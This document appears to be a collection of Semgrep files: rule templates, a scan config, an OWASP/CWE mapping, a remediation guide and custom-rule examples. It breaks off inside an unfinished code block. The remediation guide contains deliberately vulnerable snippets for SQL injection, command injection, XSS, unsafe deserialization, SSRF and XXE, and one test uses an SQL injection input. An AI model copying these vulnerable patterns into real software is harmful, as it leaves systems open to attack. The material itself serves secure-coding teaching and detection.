# Supported languages
languages: [python] # python, javascript, java, go, etc.
# Metadata for categorization and tracking
metadata:
category: security
technology: [web-app]
cwe:
- "CWE-XXX: Vulnerability Name"
owasp:
- "AXX:2021-Category Name"
confidence: HIGH # HIGH, MEDIUM, LOW
likelihood: MEDIUM # How likely is exploitation
impact: HIGH # Potential security impact
references:
- https://owasp.org/...
- https://cwe.mitre.org/data/definitions/XXX.html
subcategory:
- vuln-type # e.g., sqli, xss, command-injection
# Optional: Autofix suggestion
# fix: |
# safe_function($ARG)
# Optional: Path filtering
# paths:
# include:
# - "src/"
# exclude:
# - "*/tests/*"
# - "*/test_*.py"
# Example: SQL Injection Detection
- id: example-sql-injection
patterns:
- pattern-either:
- pattern: cursor.execute(f"... {$VAR} ...")
- pattern: cursor.execute("..." + $VAR + "...")
- pattern-not: cursor.execute("...", ...)
message: |
SQL injection vulnerability detected. User input is concatenated into SQL query.
Remediation:
- Use parameterized queries: cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
- Use ORM methods that automatically parameterize queries
severity: ERROR
languages: [python]
metadata:
category: security
cwe: ["CWE-89: SQL Injection"]
owasp: ["A03:2021-Injection"]
confidence: HIGH
likelihood: HIGH
impact: HIGH
references:
- https://owasp.org/Top10/A03_2021-Injection/
# Example: Hard-coded Secret Detection
- id: example-hardcoded-secret
pattern-regex: |
(password|passwd|pwd|secret|token|api[_-]?key)\s*=\s*['"][^'"]{8,}['"]
message: |
Potential hard-coded secret detected.
Remediation:
- Use environment variables: os.getenv('API_KEY')
- Use secrets management: AWS Secrets Manager, HashiCorp Vault
- Never commit secrets to version control
severity: WARNING
languages: [python, javascript, java, go]
metadata:
category: security
cwe: ["CWE-798: Use of Hard-coded Credentials"]
owasp: ["A07:2021-Identification-and-Authentication-Failures"]
confidence: MEDIUM
# Example: Insecure Deserialization
- id: example-unsafe-deserialization
patterns:
- pattern-either:
- pattern: pickle.loads($DATA)
- pattern: pickle.load($FILE)
# Optionally scope out known-safe wrappers with pattern-not-inside, e.g.:
# - pattern-not-inside: |
#     def load_signed_cache(...):
#         ...
message: |
Unsafe deserialization using pickle. Attackers can execute arbitrary code.
Remediation:
- Use JSON for serialization: json.loads(data)
- If pickle is required, validate and sanitize data source
- Never deserialize data from untrusted sources
severity: ERROR
languages: [python]
metadata:
category: security
cwe: ["CWE-502: Deserialization of Untrusted Data"]
owasp: ["A08:2021-Software-and-Data-Integrity-Failures"]
confidence: HIGH
likelihood: HIGH
impact: CRITICAL

View File

@@ -0,0 +1,80 @@
# Recommended Semgrep Configuration
# Save as .semgrepconfig or semgrep.yml in your project root
# Rules to run
rules: p/security-audit
# Alternative: Specify multiple rulesets
# rules:
# - p/owasp-top-ten
# - p/cwe-top-25
# - path/to/custom-rules.yaml
# Paths to exclude from scanning
exclude:
- "*/node_modules/*"
- "*/vendor/*"
- "*/.venv/*"
- "*/venv/*"
- "*/dist/*"
- "*/build/*"
- "*/.git/*"
- "*/tests/*"
- "*/test/*"
- "*_test.go"
- "test_*.py"
- "*.test.js"
- "*.spec.js"
- "*.min.js"
- "*.bundle.js"
# Paths to include (optional - scans all by default)
# include:
# - "src/"
# - "app/"
# - "lib/"
# Maximum file size to scan (in bytes)
max_target_bytes: 1000000 # 1MB
# Timeout for each file (in seconds)
timeout: 30
# Number of jobs for parallel scanning
# jobs: 4
# Metrics and telemetry (disable for privacy)
metrics: off
# Autofix mode (use with caution)
# autofix: false
# Output format
# Can be: text, json, sarif, gitlab-sast, junit-xml, emacs, vim
# Set via CLI: semgrep --config=<this-file> --json
# output_format: text
# Severity thresholds
# Only report findings at or above this severity
# Can be: ERROR, WARNING, INFO
# min_severity: WARNING
# Scan statistics
# Show timing and performance stats
# time: false
# Show stats after scanning
# verbose: false
# CI/CD specific settings
# These are typically set via CLI or CI environment
# Fail on findings
# Set exit code 1 if findings are detected
# error: true
# Baseline commit for diff scanning
# baseline_commit: origin/main
# SARIF output settings (for GitHub Security, etc.)
# sarif:
# output: semgrep-results.sarif

View File

@@ -0,0 +1,300 @@
# OWASP Top 10 to CWE Mapping with Semgrep Rules
## Table of Contents
- [A01:2021 - Broken Access Control](#a012021---broken-access-control)
- [A02:2021 - Cryptographic Failures](#a022021---cryptographic-failures)
- [A03:2021 - Injection](#a032021---injection)
- [A04:2021 - Insecure Design](#a042021---insecure-design)
- [A05:2021 - Security Misconfiguration](#a052021---security-misconfiguration)
- [A06:2021 - Vulnerable and Outdated Components](#a062021---vulnerable-and-outdated-components)
- [A07:2021 - Identification and Authentication Failures](#a072021---identification-and-authentication-failures)
- [A08:2021 - Software and Data Integrity Failures](#a082021---software-and-data-integrity-failures)
- [A09:2021 - Security Logging and Monitoring Failures](#a092021---security-logging-and-monitoring-failures)
- [A10:2021 - Server-Side Request Forgery (SSRF)](#a102021---server-side-request-forgery-ssrf)
## A01:2021 - Broken Access Control
### CWE Mappings
- CWE-22: Path Traversal
- CWE-23: Relative Path Traversal
- CWE-35: Path Traversal
- CWE-352: Cross-Site Request Forgery (CSRF)
- CWE-434: Unrestricted Upload of Dangerous File Type
- CWE-639: Authorization Bypass Through User-Controlled Key
- CWE-918: Server-Side Request Forgery (SSRF)
### Semgrep Rules
```bash
# Path traversal detection
semgrep --config "r/python.lang.security.audit.path-traversal"
# Broader access-control and authorization coverage
semgrep --config "p/security-audit"
# CSRF protection
semgrep --config "r/javascript.express.security.audit.express-check-csurf-middleware-usage"
```
### Detection Patterns
- Unrestricted file access using user input
- Missing or improper authorization checks
- Insecure direct object references (IDOR)
- Elevation of privilege vulnerabilities
## A02:2021 - Cryptographic Failures
### CWE Mappings
- CWE-259: Use of Hard-coded Password
- CWE-326: Inadequate Encryption Strength
- CWE-327: Use of Broken/Risky Crypto Algorithm
- CWE-328: Reversible One-Way Hash
- CWE-330: Use of Insufficiently Random Values
- CWE-780: Use of RSA Without OAEP
### Semgrep Rules
```bash
# Weak crypto algorithms
semgrep --config "p/crypto"
# Hard-coded secrets
semgrep --config "p/secrets"
# Insecure random
semgrep --config "r/python.lang.security.audit.insecure-random"
```
### Detection Patterns
- Use of MD5, SHA1 for cryptographic purposes
- Hard-coded passwords, API keys, tokens
- Weak encryption algorithms (DES, RC4)
- Insecure random number generation
## A03:2021 - Injection
### CWE Mappings
- CWE-79: Cross-site Scripting (XSS)
- CWE-89: SQL Injection
- CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (eval injection)
- CWE-917: Expression Language Injection
- CWE-943: Improper Neutralization of Special Elements in Data Query Logic
### Semgrep Rules
```bash
# SQL Injection
semgrep --config "r/python.django.security.injection.sql"
semgrep --config "r/javascript.sequelize.security.audit.sequelize-injection"
# XSS
semgrep --config "r/javascript.express.security.audit.xss"
semgrep --config "r/python.flask.security.audit.template-xss"
# Command Injection
semgrep --config "r/python.lang.security.audit.dangerous-subprocess-use"
# Code Injection
semgrep --config "r/python.lang.security.audit.exec-used"
semgrep --config "r/javascript.lang.security.audit.eval-detected"
```
### Detection Patterns
- Unsafe SQL query construction
- Unescaped user input in HTML context
- OS command execution with user input
- Use of eval() or similar dynamic code execution
## A04:2021 - Insecure Design
### CWE Mappings
- CWE-209: Generation of Error Message with Sensitive Information
- CWE-256: Unprotected Storage of Credentials
- CWE-501: Trust Boundary Violation
- CWE-522: Insufficiently Protected Credentials
### Semgrep Rules
```bash
# Information disclosure
semgrep --config "r/python.flask.security.audit.debug-enabled"
# Missing security controls
semgrep --config "p/security-audit"
```
### Detection Patterns
- Debug mode enabled in production
- Verbose error messages exposing internals
- Missing rate limiting
- Insecure default configurations
## A05:2021 - Security Misconfiguration
### CWE Mappings
- CWE-16: Configuration
- CWE-611: Improper Restriction of XML External Entity Reference
- CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
- CWE-756: Missing Custom Error Page
- CWE-776: Improper Restriction of Recursive Entity References in DTDs
### Semgrep Rules
```bash
# XXE vulnerabilities
semgrep --config "r/python.lang.security.audit.avoid-lxml-in-xml-parsing"
# Insecure cookie settings
semgrep --config "r/javascript.express.security.audit.express-cookie-settings"
# CORS misconfiguration
semgrep --config "r/javascript.express.security.audit.express-cors-misconfiguration"
```
### Detection Patterns
- XML External Entity (XXE) vulnerabilities
- Insecure cookie flags (missing Secure, HttpOnly, SameSite)
- Open CORS policies
- Unnecessary features enabled
## A06:2021 - Vulnerable and Outdated Components
### CWE Mappings
- CWE-1035: Using Components with Known Vulnerabilities
- CWE-1104: Use of Unmaintained Third Party Components
### Semgrep Rules
```bash
# Known vulnerable dependencies
semgrep --config "p/supply-chain"
# Deprecated APIs
semgrep --config "p/owasp-top-ten"
```
### Detection Patterns
- Outdated library versions
- Dependencies with known CVEs
- Use of deprecated/unmaintained packages
- Insecure package imports
## A07:2021 - Identification and Authentication Failures
### CWE Mappings
- CWE-287: Improper Authentication
- CWE-288: Authentication Bypass Using Alternate Path/Channel
- CWE-306: Missing Authentication for Critical Function
- CWE-307: Improper Restriction of Excessive Authentication Attempts
- CWE-521: Weak Password Requirements
- CWE-798: Use of Hard-coded Credentials
- CWE-916: Use of Password Hash With Insufficient Computational Effort
### Semgrep Rules
```bash
# Weak password hashing
semgrep --config "r/python.lang.security.audit.hashlib-md5-used"
# Missing authentication
semgrep --config "p/jwt"
# Session management
semgrep --config "r/javascript.express.security.audit.express-session-misconfiguration"
```
### Detection Patterns
- Weak password hashing (MD5, SHA1 without salt)
- Missing multi-factor authentication
- Predictable session identifiers
- Credential stuffing vulnerabilities
## A08:2021 - Software and Data Integrity Failures
### CWE Mappings
- CWE-345: Insufficient Verification of Data Authenticity
- CWE-502: Deserialization of Untrusted Data
- CWE-829: Inclusion of Functionality from Untrusted Control Sphere
- CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes
### Semgrep Rules
```bash
# Unsafe deserialization
semgrep --config "r/python.lang.security.audit.unsafe-pickle"
semgrep --config "r/javascript.lang.security.audit.unsafe-deserialization"
# Prototype pollution
semgrep --config "r/javascript.lang.security.audit.prototype-pollution"
```
### Detection Patterns
- Unsafe deserialization (pickle, YAML, JSON)
- Missing integrity checks on updates
- Prototype pollution in JavaScript
- Unsafe code loading from external sources
## A09:2021 - Security Logging and Monitoring Failures
### CWE Mappings
- CWE-117: Improper Output Neutralization for Logs
- CWE-223: Omission of Security-relevant Information
- CWE-532: Information Exposure Through Log Files
- CWE-778: Insufficient Logging
### Semgrep Rules
```bash
# Log injection
semgrep --config "r/python.lang.security.audit.logging-unsanitized-input"
# Sensitive data in logs
semgrep --config "p/secrets"
```
### Detection Patterns
- Log injection vulnerabilities
- Sensitive data logged (passwords, tokens)
- Missing security event logging
- Insufficient audit trails
## A10:2021 - Server-Side Request Forgery (SSRF)
### CWE Mappings
- CWE-918: Server-Side Request Forgery (SSRF)
### Semgrep Rules
```bash
# SSRF detection
semgrep --config "r/python.requests.security.audit.requests-http-request"
semgrep --config "r/javascript.lang.security.audit.detect-unsafe-url"
```
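In addition to the registry rules above, a project-specific custom rule can flag user-controlled URLs reaching an HTTP client. A minimal sketch (assuming a Flask-style `request.args` source and the Python `requests` library; adjust the source and sink patterns to your codebase):

```yaml
rules:
  - id: example-ssrf-user-controlled-url
    patterns:
      - pattern: requests.get($URL, ...)
      - pattern-inside: |
          $URL = request.args.get(...)
          ...
    message: User-controlled URL passed to requests.get (possible SSRF)
    severity: WARNING
    languages: [python]
    metadata:
      cwe: "CWE-918"
      owasp: "A10:2021-Server-Side-Request-Forgery"
```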
### Detection Patterns
- Unvalidated URL fetching
- Internal network access via user input
- Missing URL validation
- Bypassing access controls via SSRF
## Using This Mapping
### Scan for Specific OWASP Category
```bash
# Example: Scan for Injection vulnerabilities (A03)
semgrep --config "r/python.django.security.injection.sql" \
--config "r/python.lang.security.audit.exec-used" \
/path/to/code
```
### Comprehensive OWASP Top 10 Scan
```bash
semgrep --config="p/owasp-top-ten" /path/to/code
```
### Filter by CWE
```bash
# Scan and filter results by CWE (metadata.cwe may be a string or a list)
semgrep --config="p/security-audit" --json /path/to/code | \
  jq '.results[] | select((.extra.metadata.cwe | tostring) | contains("CWE-89"))'
```
## References
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE/SANS Top 25](https://cwe.mitre.org/top25/)
- [Semgrep Rule Registry](https://semgrep.dev/explore)

View File

@@ -0,0 +1,471 @@
# Vulnerability Remediation Guide
Security remediation patterns organized by vulnerability category.
## Table of Contents
- [SQL Injection](#sql-injection)
- [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)
- [Command Injection](#command-injection)
- [Path Traversal](#path-traversal)
- [Insecure Deserialization](#insecure-deserialization)
- [Weak Cryptography](#weak-cryptography)
- [Authentication & Session Management](#authentication--session-management)
- [CSRF](#csrf)
- [SSRF](#ssrf)
- [XXE](#xxe)
## SQL Injection
### Vulnerability Pattern
```python
# VULNERABLE
query = f"SELECT * FROM users WHERE id = {user_id}"
cursor.execute(query)
```
### Secure Remediation
```python
# SECURE: Use parameterized queries
query = "SELECT * FROM users WHERE id = %s"
cursor.execute(query, (user_id,))
# Or use ORM
user = User.objects.get(id=user_id)
```
### Framework-Specific Solutions
**Django:**
```python
# Use Django ORM (safe by default)
User.objects.filter(email=user_email)
# For raw SQL, use parameterized queries
User.objects.raw('SELECT * FROM myapp_user WHERE email = %s', [user_email])
```
**Node.js (Sequelize):**
```javascript
// Use parameterized queries
User.findAll({
where: { email: userEmail }
});
// Or use replacements
sequelize.query(
'SELECT * FROM users WHERE email = :email',
{ replacements: { email: userEmail } }
);
```
**Java (JDBC):**
```java
// Use PreparedStatement
String query = "SELECT * FROM users WHERE id = ?";
PreparedStatement stmt = conn.prepareStatement(query);
stmt.setInt(1, userId);
ResultSet rs = stmt.executeQuery();
```
## Cross-Site Scripting (XSS)
### Vulnerability Pattern
```javascript
// VULNERABLE
element.innerHTML = userInput;
document.write(userInput);
```
### Secure Remediation
```javascript
// SECURE: Use textContent for text
element.textContent = userInput;
// Or properly escape HTML
element.innerHTML = escapeHtml(userInput);
function escapeHtml(unsafe) {
return unsafe
.replace(/&/g, "&amp;")
.replace(/</g, "&lt;")
.replace(/>/g, "&gt;")
.replace(/"/g, "&quot;")
.replace(/'/g, "&#039;");
}
```
### Framework-Specific Solutions
**React:**
```javascript
// React auto-escapes by default
<div>{userInput}</div>
// For HTML content, sanitize first
import DOMPurify from 'dompurify';
<div dangerouslySetInnerHTML={{__html: DOMPurify.sanitize(userInput)}} />
```
**Flask/Jinja2:**
```python
# Templates auto-escape by default
{{ user_input }}
# For HTML content, sanitize in the view and mark it as safe
from markupsafe import Markup
import bleach
safe_html = Markup(bleach.clean(user_input))
# then render it in the template as {{ safe_html }}
```
**Django:**
```django
{# Auto-escaped by default #}
{{ user_input }}
{# Mark as safe only after sanitization #}
{{ user_input|safe }}
```
## Command Injection
### Vulnerability Pattern
```python
# VULNERABLE
os.system(f"ping {user_host}")
subprocess.call(f"ls {user_directory}", shell=True)
```
### Secure Remediation
```python
# SECURE: Use subprocess with list arguments
import subprocess
subprocess.run(['ping', '-c', '1', user_host],
capture_output=True, check=True)
# Validate input against an allowlist pattern
import re
if not re.match(r'^[a-zA-Z0-9.-]+$', user_host):
raise ValueError("Invalid hostname")
subprocess.run(['ping', '-c', '1', user_host])
```
**Node.js:**
```javascript
// VULNERABLE
exec(`ls ${userDir}`);
// SECURE
const { execFile } = require('child_process');
execFile('ls', [userDir], (error, stdout) => {
// Handle output
});
```
## Path Traversal
### Vulnerability Pattern
```python
# VULNERABLE
file_path = os.path.join('/uploads', user_filename)
with open(file_path) as f:
return f.read()
```
### Secure Remediation
```python
# SECURE: Validate and normalize path
import os
from pathlib import Path
def safe_join(directory, user_path):
# Normalize and resolve path
base_dir = Path(directory).resolve()
file_path = (base_dir / user_path).resolve()
    # Ensure the resolved path stays within the base directory
    if base_dir != file_path and base_dir not in file_path.parents:
        raise ValueError("Path traversal detected")
return file_path
try:
safe_path = safe_join('/uploads', user_filename)
with open(safe_path) as f:
return f.read()
except ValueError:
return "Invalid filename"
```
## Insecure Deserialization
### Vulnerability Pattern
```python
# VULNERABLE
import pickle
data = pickle.loads(user_data)
```
### Secure Remediation
```python
# SECURE: Use safe formats like JSON
import json
data = json.loads(user_data)
# If you must deserialize, validate and restrict
import yaml
data = yaml.safe_load(user_data) # Use safe_load, not load
```
**Node.js:**
```javascript
// VULNERABLE
const data = eval(userInput);
const obj = Function(userInput)();
// SECURE
const data = JSON.parse(userInput);
// For complex objects, use schema validation
const Joi = require('joi');
const schema = Joi.object({
name: Joi.string().required(),
email: Joi.string().email().required()
});
const { value, error } = schema.validate(JSON.parse(userInput));
```
## Weak Cryptography
### Vulnerability Pattern
```python
# VULNERABLE
import hashlib
password_hash = hashlib.md5(password.encode()).hexdigest()
```
### Secure Remediation
```python
# SECURE: Use bcrypt or argon2
import bcrypt
# Hashing
password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt())
# Verification
if bcrypt.checkpw(password.encode(), stored_hash):
print("Password correct")
# Or use argon2
from argon2 import PasswordHasher
ph = PasswordHasher()
hash = ph.hash(password)
ph.verify(hash, password)
```
**Encryption:**
```python
# VULNERABLE
from Crypto.Cipher import DES
cipher = DES.new(key, DES.MODE_ECB)
# SECURE: Use AES-GCM
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os
key = AESGCM.generate_key(bit_length=256)
aesgcm = AESGCM(key)
nonce = os.urandom(12)
ciphertext = aesgcm.encrypt(nonce, plaintext, associated_data)
```
## Authentication & Session Management
### Vulnerability Pattern
```javascript
// VULNERABLE
app.use(session({
secret: 'weak-secret',
cookie: { secure: false }
}));
```
### Secure Remediation
```javascript
// SECURE
const session = require('express-session');
app.use(session({
secret: process.env.SESSION_SECRET, // Strong random secret
resave: false,
saveUninitialized: false,
cookie: {
secure: true, // HTTPS only
httpOnly: true, // No JavaScript access
sameSite: 'strict', // CSRF protection
maxAge: 3600000 // 1 hour
}
}));
```
**Password Requirements:**
```python
# Implement strong password policy
import re
def validate_password(password):
if len(password) < 12:
return False
if not re.search(r'[A-Z]', password):
return False
if not re.search(r'[a-z]', password):
return False
if not re.search(r'[0-9]', password):
return False
if not re.search(r'[!@#$%^&*(),.?":{}|<>]', password):
return False
return True
```
## CSRF
### Vulnerability Pattern
```python
# VULNERABLE: No CSRF protection
@app.route('/transfer', methods=['POST'])
def transfer():
amount = request.form['amount']
to_account = request.form['to']
# Process transfer
```
### Secure Remediation
```python
# SECURE: Use CSRF tokens
from flask_wtf.csrf import CSRFProtect
csrf = CSRFProtect(app)
@app.route('/transfer', methods=['POST'])
def transfer():
    # CSRF token is validated automatically by CSRFProtect for state-changing requests
amount = request.form['amount']
to_account = request.form['to']
```
**Express.js:**
```javascript
const csrf = require('csurf');
const csrfProtection = csrf({ cookie: true });
app.post('/transfer', csrfProtection, (req, res) => {
// CSRF token validated
const { amount, to } = req.body;
});
```
## SSRF
### Vulnerability Pattern
```python
# VULNERABLE
import requests
url = request.args.get('url')
response = requests.get(url)
```
### Secure Remediation
```python
# SECURE: Validate URLs and use allowlist
import requests
from urllib.parse import urlparse
ALLOWED_DOMAINS = ['api.example.com', 'cdn.example.com']
def safe_fetch(url):
parsed = urlparse(url)
# Check protocol
if parsed.scheme not in ['http', 'https']:
raise ValueError("Invalid protocol")
# Check domain against allowlist
if parsed.netloc not in ALLOWED_DOMAINS:
raise ValueError("Domain not allowed")
    # Block internal IPs (the hostname may be a domain rather than an IP literal)
    import ipaddress
    try:
        ip = ipaddress.ip_address(parsed.hostname)
    except ValueError:
        ip = None  # Not an IP literal, continue
    if ip is not None and (ip.is_private or ip.is_loopback or ip.is_link_local):
        raise ValueError("Private IP not allowed")
return requests.get(url, timeout=5)
```
## XXE
### Vulnerability Pattern
```python
# VULNERABLE
from lxml import etree
tree = etree.parse(user_xml)
```
### Secure Remediation
```python
# SECURE: Disable external entities
from lxml import etree
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
dtd_validation=False
)
tree = etree.parse(user_xml, parser)
# Or use defusedxml
from defusedxml import ElementTree
tree = ElementTree.parse(user_xml)
```
**Node.js:**
```javascript
// Use secure XML parser
const libxmljs = require('libxmljs');
const xml = libxmljs.parseXml(userXml, {
noent: false, // Disable entity expansion
dtdload: false,
dtdvalid: false
});
```
## General Security Principles
1. **Input Validation**: Validate all user input against an expected format (see the sketch after this list)
2. **Output Encoding**: Encode output based on context (HTML, URL, SQL, etc.)
3. **Least Privilege**: Grant minimum necessary permissions
4. **Defense in Depth**: Use multiple layers of security controls
5. **Fail Securely**: Ensure failures don't expose sensitive data
6. **Secure Defaults**: Use secure configuration by default
7. **Keep Dependencies Updated**: Regularly update libraries and frameworks
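A minimal sketch of principles 1 and 5 together (allowlist validation plus fail-secure error handling); `lookup_user` is a hypothetical data-access helper:

```python
import re

USERNAME_PATTERN = re.compile(r"^[a-zA-Z0-9_.-]{3,32}$")  # allowlist, not a blocklist

def get_user_profile(raw_username):
    # Principle 1: validate input against the expected format before using it
    if not USERNAME_PATTERN.fullmatch(raw_username):
        raise ValueError("Invalid username")
    try:
        return lookup_user(raw_username)  # hypothetical data-access helper
    except Exception:
        # Principle 5: fail securely - return a generic error, never stack traces or internals
        return {"error": "profile unavailable"}
```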
## Testing Remediation
After applying fixes:
1. **Verify with Semgrep**: Re-scan to ensure vulnerability is resolved
```bash
semgrep --config <ruleset> fixed_file.py
```
2. **Manual Testing**: Attempt to exploit the vulnerability
3. **Code Review**: Have peer review the fix
4. **Integration Tests**: Add tests to prevent regression (see the sketch below)
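For step 4, a regression test can lock in the parameterized-query fix. A minimal sketch using Python's built-in `sqlite3` (table and function names are illustrative):

```python
import sqlite3

def get_user(conn, user_id):
    # Fixed implementation: parameterized query, never string concatenation
    return conn.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchall()

def test_sql_injection_regression():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT)")
    conn.execute("INSERT INTO users VALUES ('1', 'alice')")
    # A classic injection payload must neither dump the table nor raise a syntax error
    assert get_user(conn, "1 OR 1=1") == []
    assert get_user(conn, "1") == [("1", "alice")]
```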
## References
- [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/)
- [CWE Mitigations](https://cwe.mitre.org/)
- [Semgrep Autofix](https://semgrep.dev/docs/writing-rules/autofix/)

View File

@@ -0,0 +1,425 @@
# Semgrep Rule Library
Curated collection of useful Semgrep rulesets and custom rule writing guidance.
## Table of Contents
- [Official Rulesets](#official-rulesets)
- [Language-Specific Rules](#language-specific-rules)
- [Framework-Specific Rules](#framework-specific-rules)
- [Custom Rule Writing](#custom-rule-writing)
- [Rule Testing](#rule-testing)
## Official Rulesets
### Comprehensive Rulesets
| Ruleset | Config | Description | Use Case |
|---------|--------|-------------|----------|
| Auto | `auto` | Automatically selected rules based on detected languages | Quick scans, baseline |
| Security Audit | `p/security-audit` | Comprehensive security rules across languages | Deep security review |
| OWASP Top 10 | `p/owasp-top-ten` | OWASP Top 10 2021 coverage | Compliance, security gates |
| CWE Top 25 | `p/cwe-top-25` | SANS/CWE Top 25 dangerous errors | Critical vulnerability detection |
| CI | `p/ci` | Fast, low false-positive rules for CI/CD | Pull request gates |
| Default | `p/default` | Balanced security and quality rules | General purpose scanning |
### Specialized Rulesets
| Ruleset | Config | Focus Area |
|---------|--------|------------|
| Secrets | `p/secrets` | Hard-coded credentials, API keys |
| Cryptography | `p/crypto` | Weak crypto, hashing issues |
| Supply Chain | `p/supply-chain` | Dependency vulnerabilities |
| JWT | `p/jwt` | JSON Web Token security |
| SQL Injection | `p/sql-injection` | SQL injection patterns |
| XSS | `p/xss` | Cross-site scripting |
| Command Injection | `p/command-injection` | OS command injection |
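Rulesets can be combined in a single scan by repeating `--config`. For example, a CI-oriented scan that also checks for secrets might look like:

```bash
semgrep --config p/ci --config p/secrets --error --json --output semgrep-ci.json .
```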
## Language-Specific Rules
### Python
```bash
# Django security
semgrep --config "p/django"
# Flask security
semgrep --config "r/python.flask.security"
# General Python security
semgrep --config "r/python.lang.security"
# Specific vulnerabilities
semgrep --config "r/python.lang.security.audit.exec-used"
semgrep --config "r/python.lang.security.audit.unsafe-pickle"
semgrep --config "r/python.lang.security.audit.dangerous-subprocess-use"
```
**Key Python Rules:**
- `python.django.security.injection.sql.sql-injection-db-cursor-execute`
- `python.flask.security.xss.audit.template-xss`
- `python.lang.security.audit.exec-used`
- `python.lang.security.audit.dangerous-os-module-methods`
- `python.lang.security.audit.hashlib-md5-used`
### JavaScript/TypeScript
```bash
# Express.js security
semgrep --config "p/express"
# React security
semgrep --config "p/react"
# Node.js security
semgrep --config "r/javascript.lang.security"
# Specific vulnerabilities
semgrep --config "r/javascript.lang.security.audit.eval-detected"
semgrep --config "r/javascript.lang.security.audit.unsafe-exec"
```
**Key JavaScript Rules:**
- `javascript.express.security.audit.xss.mustache.var-in-href`
- `javascript.lang.security.audit.eval-detected`
- `javascript.lang.security.audit.path-traversal`
- `javascript.sequelize.security.audit.sequelize-injection-express`
### Java
```bash
# Spring security
semgrep --config "p/spring"
# General Java security
semgrep --config "r/java.lang.security"
# Specific frameworks
semgrep --config "r/java.spring.security"
```
**Key Java Rules:**
- `java.lang.security.audit.sqli.jdbc-sqli`
- `java.lang.security.audit.xxe.xmlinputfactory-xxe`
- `java.spring.security.audit.spring-cookie-missing-httponly`
### Go
```bash
# Go security rules
semgrep --config "r/go.lang.security"
# Specific vulnerabilities
semgrep --config "r/go.lang.security.audit.net.use-of-tls-with-go-sql-driver"
semgrep --config "r/go.lang.security.audit.crypto.use_of_weak_crypto"
```
### PHP
```bash
# PHP security
semgrep --config "p/php"
# Laravel security
semgrep --config "r/php.laravel.security"
# Specific vulnerabilities
semgrep --config "r/php.lang.security.audit.sqli"
semgrep --config "r/php.lang.security.audit.dangerous-exec"
```
## Framework-Specific Rules
### Web Frameworks
**Django:**
```bash
semgrep --config "p/django"
# Covers: SQL injection, XSS, CSRF, auth issues
```
**Flask:**
```bash
semgrep --config "r/python.flask.security"
# Covers: XSS, debug mode, secure cookies
```
**Express.js:**
```bash
semgrep --config "p/express"
# Covers: XSS, CSRF, session config, CORS
```
**Spring Boot:**
```bash
semgrep --config "p/spring"
# Covers: SQL injection, XXE, auth, SSRF
```
### Cloud & Infrastructure
**Terraform:**
```bash
semgrep --config "r/terraform.lang.security"
# Covers: S3 buckets, security groups, encryption
```
**Kubernetes:**
```bash
semgrep --config "r/yaml.kubernetes.security"
# Covers: privileged containers, secrets, rbac
```
**Docker:**
```bash
semgrep --config "r/dockerfile.security"
# Covers: unsafe base images, secrets, root user
```
## Custom Rule Writing
### Rule Anatomy
```yaml
rules:
- id: custom-rule-id
pattern: execute($SQL)
message: Potential security issue detected
severity: WARNING
languages: [python]
metadata:
category: security
cwe: "CWE-89"
owasp: "A03:2021-Injection"
confidence: HIGH
```
### Pattern Types
**1. Basic Pattern**
```yaml
pattern: dangerous_function($ARG)
```
**2. Pattern-Inside (Context)**
```yaml
patterns:
- pattern: execute($QUERY)
- pattern-inside: |
$QUERY = $USER_INPUT + ...
```
**3. Pattern-Not (Exclusion)**
```yaml
patterns:
- pattern: execute($QUERY)
- pattern-not: execute("SELECT * FROM safe_table")
```
**4. Pattern-Either (OR logic)**
```yaml
pattern-either:
- pattern: eval($ARG)
- pattern: exec($ARG)
```
**5. Metavariable Comparison**
```yaml
patterns:
- pattern: crypto.encrypt($DATA, $KEY)
- metavariable-comparison:
metavariable: $KEY
comparison: len($KEY) < 16
```
### Example Custom Rules
**Detect Hard-coded AWS Keys:**
```yaml
rules:
- id: hardcoded-aws-key
patterns:
- pattern-regex: 'AKIA[0-9A-Z]{16}'
message: Hard-coded AWS access key detected
severity: ERROR
languages: [python, javascript, java, go]
metadata:
category: security
cwe: "CWE-798"
confidence: HIGH
```
**Detect Unsafe File Operations:**
```yaml
rules:
- id: unsafe-file-read
patterns:
- pattern: open($PATH, ...)
- pattern-inside: |
def $FUNC(..., $USER_INPUT, ...):
...
$PATH = ... + $USER_INPUT + ...
...
message: File path constructed from user input (path traversal risk)
severity: WARNING
languages: [python]
metadata:
cwe: "CWE-22"
owasp: "A01:2021-Broken-Access-Control"
```
**Detect Missing CSRF Protection:**
```yaml
rules:
- id: flask-missing-csrf
patterns:
- pattern: |
@app.route($PATH, methods=[..., "POST", ...])
def $FUNC(...):
...
- pattern-not-inside: |
@csrf.exempt
...
- pattern-not-inside: |
csrf_token = ...
...
message: POST route without CSRF protection
severity: ERROR
languages: [python]
metadata:
cwe: "CWE-352"
owasp: "A01:2021-Broken-Access-Control"
```
**Detect Insecure Random:**
```yaml
rules:
- id: insecure-random-for-crypto
patterns:
- pattern-either:
- pattern: random.random()
- pattern: random.randint(...)
- pattern-inside: |
def ..._token(...):
...
message: Using insecure random for security token
severity: ERROR
languages: [python]
metadata:
cwe: "CWE-330"
fix: "Use secrets module: secrets.token_bytes(32)"
```
### Rule Metadata Best Practices
Include comprehensive metadata:
```yaml
metadata:
category: security # Type of issue
cwe: "CWE-XXX" # CWE mapping
owasp: "AXX:2021-Name" # OWASP category
confidence: HIGH|MEDIUM|LOW # Detection confidence
likelihood: HIGH|MEDIUM|LOW # Exploitation likelihood
impact: HIGH|MEDIUM|LOW # Security impact
subcategory: [vuln-type] # More specific categorization
source-rule: url # If adapted from elsewhere
references:
- https://example.com/docs
```
## Rule Testing
### Test File Structure
```
custom-rules/
├── rules.yaml # Your custom rules
└── tests/
├── test-sqli.py # Test cases
└── test-xss.js # Test cases
```
### Writing Tests
```python
# tests/test-sqli.py
# ruleid: custom-sql-injection
cursor.execute(f"SELECT * FROM users WHERE id = {user_id}")
# ok: custom-sql-injection
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
```
### Running Tests
```bash
